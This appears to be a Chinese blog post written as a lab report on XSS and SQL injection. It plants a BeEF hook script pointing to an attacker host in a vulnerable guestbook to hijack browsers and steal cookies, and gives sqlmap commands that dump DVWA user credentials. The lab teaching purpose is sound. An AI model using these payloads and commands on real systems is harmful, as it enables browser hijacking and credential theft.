初识XSS与SQL注入

最新推荐文章于 2024-04-19 16:51:44 发布
最新推荐文章于 2024-04-19 16:51:44 发布
阅读量483 收藏 1
点赞数 1
分类专栏: 安全学习 文章标签: 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47968686/article/details/110311274
版权

XSS和SQL注入

实验原理

## 1.什么是XSS
	XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。

	
	## 2.什么是xss攻击
		XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失。如这句简单的Java脚本就能轻易获取用户信息:alert(document.cookie),它会弹出一个包含用户信息的消息框。入侵者运用脚本就能把用户信息发送到他们自己的记录页面中,稍做分析便获取了用户的敏感信息。
			## XSS漏洞的分类
	1.存储型 XSS:交互形Web应用程序出现后,用户就可以将一些数据信息存储到Web服务器上。如果有某个Web应用程序的功能是负责将用户提交的数据存储到数据库中,然后在需要时将这个用户提交的数据再从数据库中提取出返回到网页中,在这个过程中,如果用户提交的数据中包含一个XSS攻击语句,一旦Web应用程序准备将这个攻击语句作为用户数据返回到网页中,那么所有包含这个回显信息的网页将全部受到XSS漏洞的影响。
	2.DOM-Based XSS漏洞:	DOM是Document Object Model(文档对象模型)的缩写。根据W3C DOM规范(),DOM是一种与浏览器、平台、语言无关的接口,使得网页开发者可以利用它来访问页面其他的标准组件。简单解释,DOM解决了Netscape的JavaScript和Microsoft的JScrtipt之间的冲突,给予Web设计师和开发者一个标准的方法,让他们来访问他们站点中的数据、脚本和表现层对象。由于DOM有如此好的功能,大量的Web应用程序开发者在自己的程序中加入对DOM的支持,令人遗憾的是,Web应用程序开发者这种滥用DOM的做法使得Web应用程序的安全也大大降低,DOM-Based XSS正是在这样的环境下出现的漏洞。DOM-Based XSS漏洞与Stored XSS漏洞不同,因为他甚至不需要将XSS攻击语句存入到数据库中,直接在浏览器的地址栏中就可以让Web应用程序发生跨站行为。对于大多数的Web应用程序来说,这种类型的XSS漏洞是最容易被发现和利用的。
	3.反射性XSS
		反射型XSS:仅对当次的页面访问产生影响。使得用户访问一个被攻击者篡改后的链接(包含恶意脚本),用户访问该链接时,被植入的攻击脚本被用户浏览器执行,从而达到攻击目的。

XSS实验部分

XSS部分:利用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。

我们在win server2012中搭建具有XSS漏洞的”我心依然“留言簿网站,注意搭建留言簿网站时需要需要给iss添加支持asp的功能,同时也要在网站根目录 属性——>安全——>添加Everyone 并设置完全控制权限,这样留言才可写入网站。

1.使用awvs扫描网站发现网站存在的漏洞

经过扫描发现存在有XSS漏洞
在这里插入图片描述

2.使用beef攻击

在kali的漏洞利用工具中可以找到beef
打开,首次打开会让我们更改密码
接着在浏览器输入http://127.0.0.1:3000/ui/panel即可打开beef,在beef中已经有了攻击使用的js代码hook.js,输入可查看

Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

3.进行XSS攻击

登录留言簿网站,写入js语句!
在这里插入图片描述
留言成功后之后该网站已被进行xss攻击
接着我们使用win7登录改网站,在kali中可以发现我们登录的信息
我们就可以使用command对目标机器进行操作,
在这里插入图片描述
获取cookie
在这里插入图片描述
给目标机器发送弹窗
在这里插入图片描述
被劫持的机器就会弹出相应的弹窗
在这里插入图片描述
我们可以在deef中使用command Redirect 在Redirect中输入一个Url,在目标机器访问留言簿网站时会自动跳转到我们设置的这一个跳转网站。
![在这里插入图片描述](https://img-blog.csdnimg.cn/20201129144636302.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ3OTY4Njg2,size_16,color_FFFFFF,t_70

该攻击属于存储型XSS

SQL注入

1.什么是sql注入攻击

	所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。

2.何时使用sql注入攻击

当Web应用向后端的数据库提交输入时,就可能遭到SQL注入攻击。可以将SQL命令人为的输入到URL、表格域,或者其他一些动态生成的SQL查询语句的输入参数中,完成上述攻击。因为大多数的Web应用程序都依赖于数据库的海量存储和相互间的逻辑关系(用户权限许可,设置等),所以,每次的查询中都会存在大量的参数。

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable虚拟机
实验准备
1.将dvwa安全级别设置为最低
2.获取注入点
3.获取cookie
4.实施注入

实验开始

2-1获取注入点

得到注入点的url
在这里插入图片描述
获取cookie值(可以通过安装TamperData插件获取cookie值,也可以通过浏览器控制台document.cookie获取,也可以通过直接查看请求头的方式获取)

2-2枚举出所有数据库

sqlmap -u "url" --cookie="cookie" --dbs

在这里插入图片描述

2-3获取数据库表名

sqlmap -u "url" --cookie="cookie" -D dvwa -tables

获取到了dvwa的表名,它有两个表一个guestbook 一个users
在这里插入图片描述

2-4查users表

sqlmap -u"url" --cookie="" -D 数据库 —T表 --columns

在这里插入图片描述

2-5列出users表中user password 列

sqlmap -u"url" --cookie="cookie" -D 数据库 -T 表 —C"user,password" --dump

爆出了用户名跟密码
在这里插入图片描述

2-6获取数据库类型,检索数据库管理系统标识

获取到操作系统,以及数据库类型
在这里插入图片描述

sqlmap -u"http://192.168.131.133/dvwa/vulnerabilities/sqli/?id=12&Submit=Submit#" --cookie="security=low; PHPSESSID=5274e58d1f17cdf8c5cfa6b63f8d3465" -b

如何防范SQL注入

Web开发人员认为SQL查询请求是可以信赖的操作,但事实却是恰恰相反的,他们没有考虑到用户可以控制这些查询请求的参数,并且可以在其中输入符合语法的SQL命令。
解决SQL注入问题的方法再次归于对特殊字符的过滤,包括URL、表格域以及用户可以控制的任何输入数据。与SQL语法相关的特殊字符以及保留字应当在查询请求提交到数据库之前进行过滤或者被去除(例如跟在反斜号后面的单引号)。过滤操作最好在服务器端进行。将过滤操作的代码插入到客户机端执行的HTML中,实在是不明智的,因为攻击者可以修改验证程序。防止破坏的唯一途径就是在服务器端执行过滤操作。避免这种攻击更加可靠的方式就是使用存储过程。

_@飞龙在天
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss攻击和SQL注入攻击
luan_tianjiao的专栏
08-21 4335
安全测试SQL注入XSS攻击
wenroudong的博客
11-05 4187
SQL注入原理: 注入攻击的本质:把用户输入的数据当做代码执行。 两个必要的条件:一是用户可以控制输入;二是原本要执行的代码拼接了用户的输入数据。 1、任何可以与数据库交互的编程语言都可能出现SQL注入漏洞。 2、SQL注入能够让攻击者对服务器进行任意的文件读取,危害巨大。 修复建议: 1、普通用户与系统管理员用户的权限要有严格的区分 数据库应该使用最小权限原则,例如普通用户不允许去查询系统表、调用loadlife函数等;即使终端用户使用SQL语句中带有嵌入式的恶意代码,由于其用户权限的限制,
XSS基础
qq_57157540的博客
04-25 3366
a.XSSSQL注入攻击中的攻击指令都是由黑客通过用户输入域注入,只不过XSS注入的是HTML代码(以后称脚本),而SQL注入注入的是SQL命令。 b.XSSSQL注入攻击都利用了Web服务器没有对用户输入数据进行严格的检查和有效过滤的缺陷 。 c.SQL注入的SQL命令在用户浏览器中执行,而XSS跨站的脚本在Web后台数据库中执行。 d.XSS攻击盗取Web终端用户的敏感数据,甚至控制用户终端操作;SQL注入攻击盗取Web后台数据库中的敏感数据,甚至控制整个数据库服务器
sql注入xss注入有什么不一样呢?
hobby云说
05-01 4402
在OWASP Top10中注入排在第一位,xss排在第七位,那么问题问题就来了,sql注入xss注入都是注入,为什么要单独把xss单独拿出来排个名呢?他俩到底有啥区别,各自的特点是啥?本文不对它俩做详细的讲解,后续会出详细讲解的文章,本文仅从概念、注入方式、危害三个方向进行对比。 概念简介 sql注入 百度曰:SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来
SQL 注入、XSS 攻击、CSRF 攻击
weixin_33910434的博客
09-22 1187
SQL 注入、XSS 攻击、CSRF 攻击 SQL 注入 什么是 SQL 注入 SQL 注入,顾名思义就是通过注入 SQL 命令来进行攻击,更确切地说攻击者把 SQL 命令插入到 web 表单或请求参数的查询字符串里面提交给服务器,从而让服务器执行编写的恶意的 SQL 命令。 对于 web 开发者来说,SQL 注入已然是非常熟悉的,而且 SQL 注入已经生存了 10 多...
XSSSQL注入
weixin_47046535的博客
12-25 421
XSSSQL注入 实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境 Kali Linux 2、Windows Server 网络环境 交换网络结构 实验工具 Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤 XSS部分 利用Beef劫持被攻击者客户端浏览器。 实验
XSSSQL注入
m0_46701146的博客
12-19 1141
实验三XSS注入 XSS注入
以小程序初识tp5.rar
10-26
9. **安全防护**:tp5框架内置了防止SQL注入XSS攻击的安全措施,同时还有CSRF保护等功能,保障了应用程序的安全性。 10. **命令行工具**:tp5提供了一个命令行工具,用于执行各种任务,如生成模型、控制器、迁移...
JavaWeb从入门到精通PPT.zip
06-19
11. **Web安全**:了解基本的安全概念,如XSS(跨站脚本攻击)、CSRF(跨站请求伪造)、SQL注入等,以及如何防止这些攻击,是任何JavaWeb开发者必备的技能。 12. **项目实战**:通过实际项目练习,将理论知识应用于...
1.初探安全.pptx
06-06
2.SQL注入 00:42:41 3.XSS 01:05:58 4.CSRF 00:21:27 5.暴力破解 00:32:11 6.文件上传 00:22:40 7.逻辑漏洞 00:07:47 【六、漏洞扫描工具】 1.NMAP 00:35:40 2.SQLMAP 00:24:44 3.AWVS 00:16:05 4.Xray 00:20:08...
sql注入xss攻击常见形式和解决方法
01-01
sql注入xss攻击常见形式和解决方法。doc
php学习:第一次学习php
02-13
- 安全性:避免SQL注入XSS攻击,使用预编译语句、过滤用户输入等。 以上是PHP学习的基本知识点,随着对PHP理解的深入,可以进一步学习更多高级主题,如PHP单元测试、设计模式、RESTful API开发等。在实践中不断...
ThinkPHP5高阶实战教程
04-19
8. **安全防护**:包括防止SQL注入XSS攻击、CSRF防护等,ThinkPHP5提供了许多安全措施,确保应用的安全运行。 9. **错误和日志管理**:理解和使用ThinkPHP5的错误处理和日志记录机制,有助于排查问题和优化代码。...
WEB安全XSS漏洞与SQL注入漏洞介绍及解决方案
m0_74131821的博客
04-18 1772
这篇文章把XSS跨站攻击和SQL注入的相关知识整理了下,比较适合初学者观看。
一文搞懂 XSS攻击、SQL注入、CSRF攻击、DDOS攻击、DNS劫持
国内某知名游戏公司小菜鸡工程师
08-08 5345
学好网络安全,以己之矛护己之盾
xsssql注入的异同点
最新发布
2303_81631620的博客
04-19 268
2.sql:sql语句的拼接,需要用到一些数据库,列,段名等,都不是固定的,只不过有的出现的次数比较多,eg:information_schema信息架构是我们常见的,但它是mysql5.0以上版本才有的,不是全都有。1.xss:攻击者通过某些方法,将恶意脚本或命令嵌入(用夹带一词也行)到用户访问的页面中,当正常用户访问页面时,触发嵌入的恶意脚本/命令,从而达到获取cookie和种马等目的。,站在数据库的角度没有语法错误的语句都是正常语句,所以都会执行,然后就可获取本无法获取的数据。
SQL注入XSS攻击
neverSaynever_的博客
02-20 1648
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
sql注入XSS
weixin_42349891的博客
07-02 3280
1.SQL Injection(SQL注入)(1)如何进行SQL注入测试?首先找到带有参数传递的URL页面,如 搜索页面,登录页面,提交评论页面等等.注1:对 于未明显标识在URL中传递参数的,可以通过查看HTML源代码中的"FORM"标签来辨别是否还有参数传递.在 和的标签中间的每一个参数传递都有可能被利用.Gamefinder注 2:当你找不到有输入行为的页面时,可以尝试找一些带有某些参数的特...
ThinkPHP6.0反序列化漏洞
m0_47968686的博客
01-21 6010
ThinkPHP6.0反序列化漏洞 前言 在学习大师傅们的thinkPHP6.0.x的反序列化漏洞复现文章时,发现自己下载的TP版本是被修复过后的版本。于是更改一下旧链达到RCE。在看本文章前先去看一下上述提到的大师傅的文章。 修补之处 __destruct链触发走的路一样 __toString链最终利用点不同 在旧版本当中,trait Attribute中499行else里面就是最终执行动态函数的地方,所以需要绕过496行的if语句。 但是我复现的时候发现了新版本做了更改即使绕过了496处的if语句在e
信安之路2017:安全学习与经验分享
"SQL注入学习总结"和"SQL注入的常规思路及奇葩技巧"分析了SQL注入的原理和应对方法,"XSS学习笔记"分为两部分,详述了XSS攻击的类型和防御手段。"Session机制及CSRF攻防"则关注了会话管理及跨站请求伪造的防范。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值